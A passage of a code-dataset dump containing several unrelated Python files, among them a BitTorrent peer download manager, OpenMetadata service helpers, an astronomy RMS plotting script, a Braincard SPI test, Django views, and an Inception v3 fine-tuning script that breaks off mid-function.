True))\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n\n # cancel_msg = CancelMessage(block.piece_index, block.start_byte_in_piece, block.length)\n # self.peer.protocol_logger.update(\"Sending cancel (timeout)\")\n # Logger().write(LogVerbosity.All, str(self.peer.id) + ' Sending cancel for piece ' + str(block.piece_index) + \", block \" + str(cancel_msg.offset // 16384))\n # self.peer.connection_manager.send(cancel_msg.to_bytes())\n\n block.remove_downloader(self.peer)\n canceled += 1\n\n if canceled:\n Logger().write(LogVerbosity.Debug, str(self.peer.id) + \" canceled \" + str(canceled) + \" blocks\")\n self.timed_out_blocks = current_time()\n\n @staticmethod\n def get_priority_timeout(priority):\n if priority >= 100:\n return 5000\n if priority >= 95:\n return 15000\n return 9999999999\n\n def has_interesting_pieces(self):\n if self.peer.bitfield is None or self.peer.bitfield.has_none:\n return False\n\n interesting_pieces = self.peer.torrent.data_manager.get_interesting_pieces()\n return self.peer.torrent.data_manager.bitfield.interested_in(self.peer.bitfield, interesting_pieces)\n\n def request_rejected(self, piece_index, offset, length):\n peer_download = [x for x in self.downloading if x[0].piece_index == piece_index and x[0].start_byte_in_piece == offset]\n if len(peer_download) != 0:\n peer_download[0][0].remove_downloader(self.peer)\n Logger().write(LogVerbosity.Debug, \"Removed a rejected request from peer download manager\")\n self.downloading.remove(peer_download[0])\n self.downloading_log = \", \".join([str(x[0].index) for x in self.downloading])\n self.timed_out_blocks = current_time()\n\n def stop(self):\n self.stopped = True\n for block, request_time, timed_out in self.downloading:\n block.remove_downloader(self.peer)\n self.downloading.clear()\n self.downloading_log = \"\"\n self.peer = None\n\n","sub_path":"src/MediaPlayer/Torrents/Peer/PeerDownloadManager.py","file_name":"PeerDownloadManager.py","file_ext":"py","file_size_in_byte":7211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"315778108","text":"# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom datetime import datetime, timedelta\nfrom typing import List\n\nfrom metadata.generated.schema.api.services.createDashboardService import (\n CreateDashboardServiceEntityRequest,\n)\nfrom metadata.generated.schema.api.services.createDatabaseService import (\n CreateDatabaseServiceEntityRequest,\n)\nfrom metadata.generated.schema.api.services.createMessagingService import (\n CreateMessagingServiceEntityRequest,\n)\nfrom metadata.generated.schema.entity.services.dashboardService import DashboardService\nfrom metadata.generated.schema.entity.services.databaseService import DatabaseService\nfrom metadata.generated.schema.entity.services.messagingService import MessagingService\nfrom metadata.ingestion.ometa.ometa_api import OpenMetadata\n\n\ndef get_start_and_end(duration):\n today = datetime.utcnow()\n start = (today + timedelta(0 - duration)).replace(\n hour=0, minute=0, second=0, microsecond=0\n )\n end = (today + timedelta(3)).replace(hour=0, minute=0, second=0, microsecond=0)\n return start, end\n\n\ndef snake_to_camel(s):\n a = s.split(\"_\")\n a[0] = a[0].capitalize()\n if len(a) > 1:\n a[1:] = [u.title() for u in a[1:]]\n return \"\".join(a)\n\n\ndef get_database_service_or_create(config, metadata_config) -> DatabaseService:\n metadata = OpenMetadata(metadata_config)\n service = metadata.get_by_name(entity=DatabaseService, fqdn=config.service_name)\n if service is not None:\n return service\n else:\n service = {\n \"jdbc\": {\n \"connectionUrl\": f\"jdbc://{config.host_port}\",\n \"driverClass\": \"jdbc\",\n },\n \"name\": config.service_name,\n \"description\": \"\",\n \"serviceType\": config.get_service_type(),\n }\n created_service = metadata.create_or_update(\n CreateDatabaseServiceEntityRequest(**service)\n )\n return created_service\n\n\ndef get_messaging_service_or_create(\n service_name: str,\n message_service_type: str,\n schema_registry_url: str,\n brokers: List[str],\n metadata_config,\n) -> MessagingService:\n metadata = OpenMetadata(metadata_config)\n service = metadata.get_by_name(entity=MessagingService, fqdn=service_name)\n if service is not None:\n return service\n else:\n created_service = metadata.create_or_update(\n CreateMessagingServiceEntityRequest(\n name=service_name,\n serviceType=message_service_type,\n brokers=brokers,\n schemaRegistry=schema_registry_url,\n )\n )\n return created_service\n\n\ndef get_dashboard_service_or_create(\n service_name: str,\n dashboard_service_type: str,\n username: str,\n password: str,\n dashboard_url: str,\n metadata_config,\n) -> DashboardService:\n metadata = OpenMetadata(metadata_config)\n service = metadata.get_by_name(entity=DashboardService, fqdn=service_name)\n if service is not None:\n return service\n else:\n created_service = metadata.create_or_update(\n CreateDashboardServiceEntityRequest(\n name=service_name,\n serviceType=dashboard_service_type,\n username=username,\n password=password,\n dashboardUrl=dashboard_url,\n )\n )\n return created_service\n\n\ndef convert_epoch_to_iso(seconds_since_epoch):\n dt = datetime.utcfromtimestamp(seconds_since_epoch)\n iso_format = dt.isoformat() + \"Z\"\n return iso_format\n","sub_path":"ingestion/src/metadata/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"469854105","text":"from sys import argv\nfrom os import path\nimport numpy as np\nfrom pyDANDIA import hd5_utils\nfrom pyDANDIA import logs\nfrom pyDANDIA import metadata\nfrom pyDANDIA import pipeline_setup\nfrom pyDANDIA import normalize_photometry\nfrom pyDANDIA import crossmatch\nfrom pyDANDIA import field_photometry\nfrom pyDANDIA import plot_rms\nfrom pyDANDIA import plotly_lightcurves\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\n\ndef calc_field_rms():\n\n params = get_args()\n\n log = logs.start_stage_log( params['red_dir'], 'field_rms' )\n\n # Crossmatch table provides information on the filter used for each image\n xmatch = crossmatch.CrossMatchTable()\n xmatch.load(params['crossmatch_file'],log=log)\n log.info('Loaded crossmatch table for the field')\n\n filter_list = np.unique(xmatch.images['filter'].data)\n log.info('Identified list of filters to process: '+repr(filter_list))\n\n log.info('Loading the timeseries photometry...')\n phot_data = hd5_utils.read_phot_from_hd5_file(params['phot_file'], return_type='array')\n log.info('-> Completed photometry load')\n\n # By default, select the columns of photometry that have been normalized:\n (mag_col, mag_err_col) = field_photometry.get_field_photometry_columns('normalized')\n qc_col = 16\n\n # Plot a separate RMS diagram for each filter\n for filter in filter_list:\n image_index = np.where(xmatch.images['filter'] == filter)[0]\n phot_data_filter = phot_data[:,image_index,:]\n jdx = np.where(xmatch.field_index['quadrant'] == float(int(params['quadrant'])))[0]\n log.info(str(len(jdx))+' stars in quadrant '+params['quadrant'])\n\n # Calculate lightcurve statistics, filtering out any with zero measurements:\n phot_statistics = np.zeros( (len(phot_data_filter),3) )\n\n phot_statistics[:,0] = xmatch.stars['field_id'][jdx]\n (phot_statistics[:,1],werror) = plot_rms.calc_weighted_mean_2D(phot_data_filter, mag_col, mag_err_col, qc_col=qc_col)\n phot_statistics[:,2] = plot_rms.calc_weighted_rms(phot_data_filter, phot_statistics[:,1], mag_col, mag_err_col, qc_col=qc_col)\n\n selection = np.logical_and(phot_statistics[:,1] > 0.0, phot_statistics[:,2] > 0.0)\n phot_statistics = phot_statistics[selection]\n\n # Plot interactive RMS diagram\n plot_file = path.join(params['red_dir'], params['plot_file_root']+'_'+filter+'.html')\n axis_labels = ['Mag', 'RMS [mag]']\n target_params = {}\n plot_title = 'RMS diagram for '+params['field_name']+', quadrant '\\\n +params['quadrant']+', '+filter+'-band'\n plotly_lightcurves.plot_interactive(phot_statistics, plot_file, axis_labels,\n target_params, title=plot_title, logy=True, xreverse=True)\n\n logs.close_log(log)\n\ndef get_args():\n\n params = {}\n\n if len(argv) == 1:\n\n params['red_dir'] = input('Please enter the path to the top-level data directory: ')\n params['field_name'] = input('Please enter the name of the field: ')\n params['quadrant'] = input('Please enter the index number of the quadrant to analyse: ')\n\n else:\n\n params['red_dir'] = argv[1]\n params['field_name'] = argv[2]\n params['quadrant'] = argv[3]\n\n params['crossmatch_file'] = path.join(params['red_dir'],\n params['field_name']+'_field_crossmatch.fits')\n params['phot_file'] = path.join(params['red_dir'],\n params['field_name']+'_quad'+params['quadrant']\n +'_photometry.hdf5')\n params['plot_file_root'] = params['field_name']+'_quad'+params['quadrant'] \\\n +'_rms_postnorm'\n\n return params\n\n\nif __name__ == '__main__':\n calc_field_rms()\n","sub_path":"pyDANDIA/plot_field_rms.py","file_name":"plot_field_rms.py","file_ext":"py","file_size_in_byte":3768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"626957075","text":"##\n## Test SPI\n##\n## Series of SPI access to the Braincard including\n## single and multiple Read/Write commands\n##\n## Adjust the clock speed settings if necessary for stability\n##\nimport time\n\nimport Braincard\nfrom constants import *\n\nBraincard.connect(500000);\n\nBraincard.write(CM1K,FORGET,0);\n\nvalue1= 1;\nvalue2= 4096;\nvalue3=10;\nlength=10;\niteration=0;\nerror=0;\n\n#while True:\nwhile iteration<20:\n error=0;\n \n ## Single write to the MINIF and MAXIF registers\n value=Braincard.write(CM1K,MINIF, value1);\n value=Braincard.write(CM1K,MAXIF, value2);\n\n ## Multiple write to the COMP register\n ## after setting the neurons in save and restore mode\n Braincard.write(CM1K, NSR,16);\n Braincard.write(CM1K, RESETCHAIN,0);\n data=[0 for i in range(0,length)]\n for i in range(0,length):\n data[i]=value3+i;\n Braincard.writeAddr(0x01000001, length, data);\n Braincard.read(CM1K, CAT) ##to move to next neuron in the chain\n Braincard.write(CM1K, NSR,0); ##set CM1K in normal mode\n\n ## Single read to the MINIF and MAXIF registers\n ## and verification of the expected value\n value=Braincard.read(CM1K,MINIF);\n if (value!=value1):\n error=1;\n print(\"ERROR, incorrect Minif=%u\" % value);\n \n value=Braincard.read(CM1K,MAXIF);\n if (value!=value2):\n error=2;\n print(\"ERROR2, incorrect Maxif=%u\" % value);\n\n ## Multiple write to the COMP register\n ## after setting the neurons in save and restore mode\n Braincard.write(CM1K, NSR,16); ##set CM1K in save and restore mode\n Braincard.write(CM1K, RESETCHAIN,0);\n data=Braincard.readAddr(0x01000001, length);\n for i in range(0,length):\n if(data[i]!= value3+i):\n error=3;\n print(\"ERROR3, incorrect COMP %u = %u\" % (i, data[i]));\n Braincard.read(CM1K, CAT) ##to move to next neuron in the chain\n Braincard.write(CM1K, NSR,0); ##set CM1K in normal mode\n\n if (error==0):\n print (\"\\nIteration= %u, Pass\" % iteration);\n\n iteration=iteration+1; \n value1=value1+1;\n if (value1==256):\n value1=0\n value2=value2-1;\n if (value2==0):\n value2=4096;\n value3=value3+1;\n if (value3==256):\n value3=0;\n\n\n","sub_path":"braincard/Test_SPIcomm.py","file_name":"Test_SPIcomm.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"608180774","text":"import uuid\nimport pytz\nfrom collections import defaultdict\nfrom sqlalchemy.inspection import inspect\nfrom flask_sqlalchemy import before_models_committed, models_committed\n\nfrom api import db, after_app_created\n\n__author__ = 'Kostel Serhii'\n\n\ndef _first_level_dict(obj, data):\n if not data:\n return dict()\n return dict((key, value) for key, value in data.items() if hasattr(obj, key) and not isinstance(value, dict))\n\n\nclass BaseModel(db.Model):\n \"\"\" Base model for all models \"\"\"\n\n __abstract__ = True\n\n @classmethod\n def get_pk_field_name(cls):\n \"\"\"\n Get primary key from model.\n Work ONLY with single primary key!, else raise exception.\n :return: primary key field name\n \"\"\"\n primary_key_fields = inspect(cls).primary_key\n if len(primary_key_fields) == 0:\n raise AttributeError('Primary key field not fount')\n if len(primary_key_fields) > 1:\n raise AttributeError('Got more than one primary key')\n\n return primary_key_fields[0].name\n\n @classmethod\n def unique(cls, field_name, checked_value):\n \"\"\"\n Check is field unique or not.\n :param field_name: name of the model field to check\n :param checked_value: value to check for unique\n :return: is checked_value unique for field with field_name for current model\n :raise Error: if field with field_name not found in current model\n \"\"\"\n return cls.query.filter_by(**{field_name: checked_value}).count() == 0\n\n @classmethod\n def exists(cls, primary_key):\n \"\"\"\n Check is row with primary key exists.\n Work ONLY with single field primary key, else raise exception.\n :param primary_key: checked primary key value\n :return: boolean value exists or not (True/False)\n \"\"\"\n pk_field_name = cls.get_pk_field_name()\n return not cls.unique(pk_field_name, primary_key)\n\n @classmethod\n def create(cls, data, add_to_db=True):\n \"\"\"\n Create new model on the base of data dict.\n :param data: dict with created fields and values\n :param add_to_db: add updated model to db session or not\n :return: new model instance\n \"\"\"\n data = _first_level_dict(cls, data)\n model = cls(**data)\n if data and add_to_db:\n db.session.add(model)\n return model\n\n def update(self, data, add_to_db=True):\n \"\"\"\n Update model from data dict\n :param data: dict with undated fields and values\n :param add_to_db: add updated model to db session or not\n \"\"\"\n data = _first_level_dict(self, data)\n for key, value in data.items():\n setattr(self, key, value)\n if data and add_to_db:\n db.session.add(self)\n\n\nclass _EventHandler:\n \"\"\"\n Class that handel sqlalchemy events.\n \"\"\"\n _subscribers_store_mapper = {\n 'before': defaultdict(list),\n 'after': defaultdict(list)\n }\n\n @classmethod\n def _committed(cls, changes, subscribers_store):\n for model_instance, operation in changes:\n subscribers = subscribers_store.get((model_instance.__class__.__name__, operation))\n if subscribers is not None:\n for subscribe_func in subscribers:\n subscribe_func(model_instance)\n\n @classmethod\n def before_committed(cls, sender, changes):\n cls._committed(changes, cls._subscribers_store_mapper.get('before'))\n\n @classmethod\n def after_committed(cls, sender, changes):\n cls._committed(changes, cls._subscribers_store_mapper.get('after'))\n\n @classmethod\n def register(cls, model_class, event_type, subscribe_func):\n committed_status, _, operation = event_type.partition('_')\n subscribers_store = cls._subscribers_store_mapper.get(committed_status)\n if subscribers_store is not None:\n subscribers_store[(model_class.__name__, operation)].append(subscribe_func)\n\n\n@after_app_created\ndef register_connection(app):\n before_models_committed.connect(_EventHandler.before_committed, sender=app)\n models_committed.connect(_EventHandler.after_committed, sender=app)\n\n\ndef on_model_event(model_class, event_type):\n \"\"\"\n On database event decorator.\n Subscribe function with database model class to specified event.\n Parameter \"event_type\" is combination of before/after prefix\n and insert/update/delete suffix connect by \"_\" symbol.\n Prefix:\n - before - before_commit\n - after - after_commit\n Suffix:\n - insert - create model\n - update - update model\n - delete - delete model\n\n :param object model_class: database class model\n :param str event_type: event type (e.g. before_insert, after_delete)\n \"\"\"\n def register_event_subscribe_func(func):\n _EventHandler.register(model_class, event_type, func)\n return func\n return register_event_subscribe_func\n\n\n# functions for fields default\n\ndef uuid_id():\n return str(uuid.uuid4())\n\n# use only as server_default=base.now_dt or onupdate=base.now_dt\nnow_dt = db.func.now(tz=pytz.utc)\n","sub_path":"api/models/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"640873892","text":"\"\"\" Functional testing for API - stations using wf1 \"\"\"\nfrom pytest_bdd import scenario, given, then\nfrom fastapi.testclient import TestClient\nfrom aiohttp import ClientSession\nfrom app.main import app\nfrom app.tests.common import default_mock_client_get\n\n\n@scenario('test_stations.feature', 'Get weather stations from WFWX',\n example_converters=dict(status=int, index=int, code=int, name=str, lat=float,\n long=float, ecodivision_name=str, core_season=dict))\ndef test_stations_scenario():\n \"\"\" BDD Scenario. \"\"\"\n\n\n# pylint: disable=unused-argument\n@given(\"I request a list of weather stations\")\ndef response(monkeypatch, mock_env_with_use_wfwx):\n \"\"\" Mock external requests and make GET /stations/ request \"\"\"\n monkeypatch.setattr(ClientSession, 'get', default_mock_client_get)\n\n client = TestClient(app)\n return client.get('/stations/')\n\n\n# pylint: disable=unused-argument, redefined-outer-name, too-many-arguments\n@then(\"the response status code is <status>\")\ndef status_code(response, status: int):\n \"\"\" Assert that we receive the expected status code \"\"\"\n assert response.status_code == status\n\n\n@then(\"there are active 16 weather stations\")\ndef active_16_weather_stations(response):\n \"\"\" We expect there to be 16 weather stations. Even though we were given 50 stations from the\n API, some of those stations are inactive/invalid/disabled or don't have lat/long.\n \"\"\"\n assert len(response.json()['weather_stations']) == 16\n\n\n@then(\"there is a station in <index> has <code>, <name>, <lat> and <long>\")\ndef there_is_a_station(response, index, code, name, lat, long):\n \"\"\" We expect a station to have a code, name, lat and long. \"\"\"\n assert (response.json()['weather_stations'][index]['code'] == code and\n response.json()['weather_stations'][index]['name'] == name and\n response.json()['weather_stations'][index]['lat'] == lat and\n response.json()['weather_stations'][index]['long'] == long)\n\n\n@then(\"the station has <ecodivision_name> with core_season <start_month> <start_day> - <end_month> <end_day>\")\ndef station_ecodivision_data(response, index, ecodivision_name, start_month, start_day, end_month, end_day):\n \"\"\" We expect station's ecodivision to have name, start_month start_day - end_month end_day \"\"\"\n assert (response.json()['weather_stations'][index]['ecodivision_name'] == ecodivision_name and\n response.json()['weather_stations'][index]['core_season'] == {\n \"start_month\": int(start_month),\n \"start_day\": int(start_day),\n \"end_month\": int(end_month),\n \"end_day\": int(end_day)})\n","sub_path":"app/tests/test_stations.py","file_name":"test_stations.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"218971769","text":"import pandas as pd\nimport numpy as np\nimport random\nimport matplotlib.pyplot\n\n\nclass Population:\n #initialize a random population of n entires between minNum and maxNum\n def __init__(self, minNum, maxNum, n):\n self.min= minNum\n self.max = maxNum\n self.n = n\n \n self.pop = []\n for x in range(n):\n self.pop.append(random.randint(self.min,self.max))\n \n self.pop_mean = np.mean(self.pop)\n self.pop_stdev = np.std(self.pop)\n self.pop_var = np.var(self.pop)\n self.pop_n = len(self.pop)\n \n #sets up the histogram plot based on if an arguement was passed or not\n def plot_population(self, data = []):\n #if no data is passed in, then self.pop aka the population that is made when the class is initialized is plotted. If some data is passed in, then that data is plotted\n if data == []:\n data = self.pop\n self.__hist__(data)\n \n #plots histogram\n def __hist__(self, data):\n fig = matplotlib.pyplot.figure()\n matplotlib.pyplot.hist(data, bins=101, density=False)\n fig.suptitle('Frequency', fontsize=15)\n matplotlib.pyplot.xlabel(\"Number\")\n matplotlib.pyplot.ylabel(\"Frequency\")\n #matplotlib.pyplot.xlim(0,100)\n matplotlib.pyplot.show()\n \n #prints population parameters\n def get_statistics(self):\n print(f\"Population n = {self.pop_n}\")\n print(f\"Population Mean = {self.pop_mean}\")\n print(f\"Population Variance = {self.pop_var}\")\n print(f\"Population Standard Deviation = {self.pop_stdev}\")\n \n #randomly picks sample, returns sample data\n def get_sample(self, sample_size=30):\n sample = random.sample(self.pop, sample_size)\n return {\n \"n\":len(sample),\n \"mean\":np.mean(sample),\n \"bi-var\":np.var(sample),\n \"unbi-var\":np.var(sample, ddof=1),\n \"stdev\":np.std(sample, ddof = 1),\n \"sample\":sample\n }\n \n #picks n number of samples and reeturns a list of all of their means\n def get_sampling_distribution(self, n, sample_size =30):\n sample_mean_list = []\n for i in range(n):\n sample_mean_list.append(self.get_sample(sample_size)[\"mean\"])\n return sample_mean_list\n \n\nclass NormalPopulation(Population):\n \n def __init__(self, mean, stdev, n):\n self.mean = mean\n self.stdev = stdev\n self.n = n\n \n self.pop = np.random.normal(self.mean,self.stdev,self.n).tolist()\n self.pop_mean = np.mean(self.pop)\n self.pop_stdev = np.std(self.pop)\n self.pop_var = np.var(self.pop)\n self.pop_n = len(self.pop)\n\n def get_samples_mean_variances(self, num_samples_max, sample_size=30):\n aggregate_df = pd.DataFrame(columns = [\"Number of Samples\", \"Mean Biased Variance\", \"Mean Unbiased Variance\"])\n for i in range(1,num_samples_max+1, 5):\n temp_df = pd.DataFrame(columns = [\"Mean\", \"Biased Variance\", \"Unbiased Variance\"])\n for j in range(i):\n sample = self.get_sample(sample_size)\n temp_df.loc[len(temp_df.index)] = [sample[\"mean\"], sample[\"bi-var\"], sample[\"unbi-var\"]]\n aggregate_df.loc[len(aggregate_df.index)] = [i, temp_df.mean()[\"Biased Variance\"], temp_df.mean()[\"Unbiased Variance\"]]\n return aggregate_df\n ","sub_path":"NormalPopulation.py","file_name":"NormalPopulation.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"352233810","text":"from django.shortcuts import redirect\nfrom Jingo.models import *\nhttp_res = HttpRequestResponser()\n\ndef init(request):\n # for post notes\n data = {}\n data['uid'] = request.session['uid']\n data['tagslist'] = Tag().getUserCategoryTagsList(data)\n #data = dict([('tagslist', data)])\n #print data\n data['n_request'] = len(Friend.objects.filter(f_uid=data['uid'], is_friendship=2).values())\n return Formatter().createResultSet(data)\n\ndef index(request):\n page = 'login.html'\n if request.session.get('uid', False):\n page = 'index.html'\n data = init(request)\n return http_res.response(request, page, data)\n return http_res.response(request, page)\n\ndef admin(request):\n if isRedirect(request):\n page = 'admin.html'\n data = AdminArea().init()\n \n return http_res.response(request, page, data)\n\ndef isRedirect(request, target='index'):\n if request.session.get('uid', False):\n return redirect(target)\n return False\n\n# redirect to specific pages\ndef pages(request, mode):\n if mode == 'signup':\n return http_res.response(request, 'signup.html')\n\n if mode == 'login':\n if request.session.get('uid', False):\n return redirect('index')\n else:\n return http_res.response(request, 'login.html')\n\n if mode == 'profile':\n if request.session.get('uid', False):\n usr = request.session['usrdata']\n return http_res.response(request, 'profile.html', dict([('stateslist', State().getUserStatesAndFiltersList(usr))]))\n else: \n return redirect('/pages/login/')\n \n if mode == 'friends':\n if request.session.get('uid', False):\n return http_res.response(request, 'friends.html', User().initFriendArea(request))\n else: \n return redirect('/pages/login/')\n\n# deal with AJAX request and database access\ndef tasks(request, mode):\n # API for user behaviors\n if mode == 'logout':\n data = User().logout(request)\n return redirect('/pages/login/')\n\n if mode == 'signup':\n page = 'profile.html'\n data = User().signup(request)\n if data['result']:\n return redirect('/pages/profile/')\n else:\n return http_res.response(request, 'signup.html', data)\n\n if mode == 'login':\n data = User().login(request)\n if data['result']:\n return redirect('index')\n else:\n return http_res.response(request, 'login.html', data)\n\n # API for profile settings\n if mode == 'setDefaultState':\n data = State().setDefaultState(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addState':\n page = 'state.html'\n data = State().addState(request)\n return http_res.response(request, page, data)\n\n if mode == 'deleteState':\n data = State().deleteState(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'updateState':\n data = State().updateState(request)\n return http_res.responseJSON(request, data)\n\n # API for filter settings\n if mode == 'activateFilter':\n data = Filter().activateFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addFilter':\n data = Filter().addFilterAndTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'deleteFilter':\n data = Filter().deleteFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'updateFilter':\n data = Filter().updateFilter(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'retrieveFilter':\n page = 'filter.html'\n data = Filter().retrieveFilter(request)\n return http_res.response(request, page, data)\n\n # API for note settings\n if mode == 'postNote':\n data = User().postNote(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'searchNotes':\n data = User().searchNotes(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'postComment':\n data = User().postComment(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'deleteNoteTag':\n data = User().deleteNoteTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'addExtraNoteTag':\n data = User().addExtraNoteTag(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'clickLike':\n data = User().clickLike(request)\n return http_res.responseJSON(request, data)\n\n if mode == 'receiveNotes':\n data = User().receiveNotes(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'readNote':\n page = 'note.html'\n data = User().readNote(request)\n return http_res.response(request, page, data)\n\n # API for Friendship settings\n if mode == 'sendInvitation':\n data = User().sendInvitation(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'replyInvitation':\n data = User().replyInvitation(request)\n return http_res.responseJSON(request, data)\n \n if mode == 'unfollow':\n data = User().unfollow(request)\n return http_res.responseJSON(request, data)\n ","sub_path":"Jingo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"198015960","text":"\"\"\"\n Name: train_model.py\n Created: 10/7/2017\n Description: Fine-tune inception v3 for Planet Amazon.\n\"\"\"\n#==============================================\n# Modules\n#==============================================\nimport os\nimport sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=sys.argv[1]\nimport numpy as np\nimport pandas as pd\nimport time\nimport gzip\nimport pickle\nfrom collections import Counter\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.preprocessing.image import load_img, img_to_array\nfrom keras.models import Model, model_from_json\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras import backend as K\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint, ReduceLROnPlateau\nfrom keras.applications.imagenet_utils import decode_predictions\nfrom keras.optimizers import SGD, Adam\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import fbeta_score\nfrom tqdm import tqdm\n#==============================================\n# Files\n#==============================================\n_EPSILON = K.epsilon()\nfrom extend_image_data_generator import ImageDataGenerator\n\n\n#==============================================\n# Functions\n#==============================================\ndef instantiate(n_classes, n_dense=2048, inception_json=\"inceptionv3_128_mod.json\", target_size=(139,139,3), verbose=1):\n \"\"\"\n Instantiate the inception v3.\n \"\"\"\n\n # create the base pre-trained model\n base_model = InceptionV3(weights='imagenet', include_top=False, input_shape=target_size)\n\n # add a global spatial average pooling layer\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # let's add a fully-connected layer\n x = Dense(n_dense, activation='relu')(x)\n # and a final logistic layer\n predictions = Dense(n_classes, activation='sigmoid')(x)\n\n # this is the model we will train\n model = Model(inputs=base_model.input, outputs=predictions)\n\n # first: train only the top layers (which were randomly initialized)\n # i.e. freeze all convolutional InceptionV3 layers\n for layer in base_model.layers:\n layer.trainable = False\n\n # compile the model (should be done *after* setting layers to non-trainable)\n model.compile(optimizer=Adam(lr=0.001), loss=\"binary_crossentropy\", metrics=[fbs])\n\n # serialize model to json\n model_json = model.to_json()\n with open(inception_json, \"w\") as iOF:\n iOF.write(model_json)\n\n return base_model, model\n\n\n\n\ndef finetune(base_model, model, X_train, y_train, X_val, y_val,\n epochs_1=1000, patience_1=2,\n patience_lr=1, batch_size=32,\n nb_train_samples=41000, nb_validation_samples=7611,\n img_width=299, img_height=299, class_imbalance=False,\n inception_h5_1=\"inceptionv3_128_fine_tuned_1.h5\",\n inception_h5_check_point_1=\"inceptionv3_128_fine_tuned_check_point_1.h5\",\n layer_names_file=\"inceptionv3_128_mod_layer_names.txt\", verbose=1):\n \"\"\"\n Finetune the inception v3.\n \"\"\"\n\n # let's visualize layer names and layer indices to see how many layers\n # we should freeze:\n with open(layer_names_file, \"w\") as iOF:\n for ix, layer in enumerate(model.layers):\n iOF.write(\"%d, %s\\n\"%(ix, layer.name))\n if verbose >= 4: print(ix, layer.name)\n\n # this is the augmentation configuration we will use for training\n train_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.2,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.4,\n p_shift=0.4)\n\n # this is the augmentation configuration we will use for testing:\n test_datagen = ImageDataGenerator(\n preprocessing_function=preprocess_input,\n horizontal_flip=True,\n vertical_flip=True,\n zoom_range=0.15,\n width_shift_range=0.15,\n height_shift_range=0.15,\n rotation_range=180,\n fill_mode='reflect',\n p_rotation=0.,\n rotation_angles=[-90, 0, 90, 180],\n p_zoom=0.,\n p_shift=0.)\n\n # define train & val data generators\n train_generator = train_datagen.flow(\n X_train,\n y_train,\n batch_size=batch_size,\n shuffle=True)\n\n validation_generator = test_datagen.flow(\n X_val,\n y_val,\n batch_size=batch_size,\n shuffle=True)\n\n # get class weights\n if class_imbalance:\n class_weight = get_class_weights(np.sum(y_train, axis=0), smooth_factor=0.1)\n else:\n class_weight = None\n\n # train the model on the new data for a few epochs on the batches generated by datagen.flow().\n model.fit_generator(\n train_generator,\n steps_per_epoch=nb_train_samples // batch_size,\n epochs=epochs_1,\n validation_data=validation_generator,\n validation_steps=nb_validation_samples // batch_size,\n callbacks=[EarlyStopping(monitor='val_loss', patience=patience_1),\n ModelCheckpoint(filepath=inception_h5_check_point_1, save_best_only=True),\n ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=patience_lr)],\n class_weight=class_weight)\n\n # save weights just in case\n model.save_weights(inception_h5_1)\n\n\n\n\ndef finetune_from_saved(inception_h5_load_from, inception_h5_save_to,\n inception_json, X_train, y_train, X_val, y_val, nb_freeze=172,\n epochs=5000, patience=2, patience_lr=1, batch_size=32,\n nb_train_samples=85639, nb_validation_samples=10694, optimizer_lr=0.0002,\n img_width=299, img_height=299, class_imbalance=False,\n inception_h5_check_point=\"inceptionv3_128_fine_tuned_check_point_2.h5\", verbose=1):\n \"\"\"\n Finetune the inception v3 from already fine-tuned one.\n \"\"\"\n\n # load json and create model\n with open(inception_json, 'r') as iOF:\n loaded_model_json = iOF.read()\n loaded_model = model_from_json(loaded_model_json)\n # load weights into new model\n loaded_model.load_weights(inception_h5_load_from)\n if verbose >= 1: print(\"Loaded model from disk\")\n\n # we freeze the first nb_freeze layers and unfreeze the rest:\n for layer in 